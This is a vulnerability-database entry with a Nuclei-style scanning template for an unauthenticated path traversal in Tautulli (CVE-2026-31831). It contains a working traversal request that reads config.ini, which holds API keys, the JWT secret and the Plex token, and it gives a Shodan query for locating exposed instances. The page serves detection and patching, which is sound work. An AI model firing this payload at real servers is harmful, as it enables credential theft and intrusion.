/Vulnerability Library

Tautulli <= 2.16.1 - Path Traversal

CVE-2026-31831
Verified

Description

Tautulli is a monitoring and tracking tool for Plex Media Server. Prior to version 2.17.0, the `/newsletter/image/images` endpoint joins user-controlled path segments onto the newsletter image directory without containment validation. Authentication is not required for this endpoint, allowing unauthenticated attackers to perform directory traversal and read arbitrary files accessible to the server process. Reading `config/config.ini` discloses the API key, the hashed admin password, the JWT token secret, and the Plex Media Server token. Version 2.17.0 fixes this issue.

Severity

High

CVSS Score

7.5

Exploit Probability

2%

Affected Product

tautulli

Published Date

June 5, 2026

Template Author

wrg-11

CVE-2026-31831.yaml
id: CVE-2026-31831

info:
  name: Tautulli <= 2.16.1 - Path Traversal
  author: WRG-11
  severity: high
  description: |
    Tautulli is a monitoring and tracking tool for Plex Media Server. Prior to version 2.17.0, the `/newsletter/image/images` endpoint joins user-controlled path segments onto the newsletter image directory without containment validation. Authentication is not required for this endpoint, allowing unauthenticated attackers to perform directory traversal and read arbitrary files accessible to the server process. Reading `config/config.ini` discloses the API key, the hashed admin password, the JWT token secret, and the Plex Media Server token. Version 2.17.0 fixes this issue.
  impact: |
    Unauthenticated attackers can read arbitrary files accessible to the server, including `config.ini` (API key, hashed admin password, JWT secret, Plex token) and `tautulli.db` (active JWT tokens).
  remediation: |
    Update to version 2.17.0 or later.
  reference:
    - https://github.com/Tautulli/Tautulli/security/advisories/GHSA-xp55-2pf4-fv8m
    - https://nvd.nist.gov/vuln/detail/CVE-2026-31831
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-31831
    epss-score: 0.01965
    epss-percentile: 0.78818
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    vendor: tautulli
    product: tautulli
    shodan-query: http.title:"Tautulli"
  tags: cve,cve2026,tautulli,lfi,traversal

http:
  - raw:
      - |
        GET /newsletter/image/images/..%2F..%2F..%2F..%2F..%2F..%2Fconfig%2Fconfig.ini HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "[General]"
          - "[PMS]"
          - "pms_identifier"
        condition: and

      - type: word
        part: content_type
        words:
          - "image/png"

      - type: status
        status:
          - 200
# digest: 490a0046304402204c7ced46dd1df86d4f0df2b16f4a08a2d352f6fee0672a792c5e6cd912b5a72402202b621422516e45de80211c1190f68ad298ddb3378e49c4a6df3375cb902d7cef:922c64590222798bb761d5b6d8e72950
7.5Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2026-31831
CWE ID:
cwe-22

References

https://github.com/Tautulli/Tautulli/security/advisories/GHSA-xp55-2pf4-fv8mhttps://nvd.nist.gov/vuln/detail/CVE-2026-31831

Remediation Steps

Update to version 2.17.0 or later.